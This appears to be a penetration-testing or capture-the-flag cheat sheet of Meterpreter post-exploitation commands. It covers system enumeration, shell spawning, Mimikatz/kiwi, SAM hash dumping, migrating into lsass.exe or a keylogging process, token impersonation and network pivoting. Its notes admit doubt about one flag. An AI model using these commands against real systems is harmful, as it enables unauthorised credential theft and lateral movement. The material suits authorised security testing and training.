https://github.com/rapid7/meterpreter

Enumeration

sysinfo
Info about the system.

getenv
Get one or more environment variable values.

getuid
Get current user.

getprivs
Display current user privileges.

search -f flag.txt
Search a file on the machine.

File Transfer

upload
Upload a file or directory.

download
Download a file or directory.

Spawn Shell

shell
Spawn a shell.

load powershell
powershell_shell
Load the powershell extension, then spawn a PowerShell prompt.

Spawn Mimikatz

privilege::debug
Ensure that the current user has administrator privileges (the output should contain '20' OK). This indicates that debugging a process is possible.


load kiwi
Starts Mimikatz.

help kiwi
Show Mimikatz commands.

Attacks

hashdump
Dump password hashes from the Windows SAM database (for Linux, use the module linux/gather/hashdump).

migrate 716
Migrate to another process (here, PID 716).
Ex: migrate to word.exe and act like a keylogger.
Ex: migrate to lsass.exe to run hashdump.

Impersonate

If the current user has the SeDebugPrivilege and SeImpersonatePrivilege privileges enabled, we are able to impersonate another user.

load incognito
Load the incognito module.

list_tokens -u
List available delegation tokens (not sure of the flag, maybe -g).

impersonate_token "BUILTIN\Administrators"
Impersonate the given token.

To determine rights, Windows uses the primary token of the process, not the impersonated token. So we have to migrate to a process with the correct permissions.

The safest process to pick is services.exe.

migrate 668
Migrate to process 668.

rev2self
Revert to the previous user.

Pivoting

When we have a Meterpreter shell on a machine that has access to another network, we can use it to gain access to that second network.

run autoroute -s [REMOTE_NETWORK]/24
Add a route to the remote network through the host we already have access to.

run autoroute -p
Show the routes that have been added.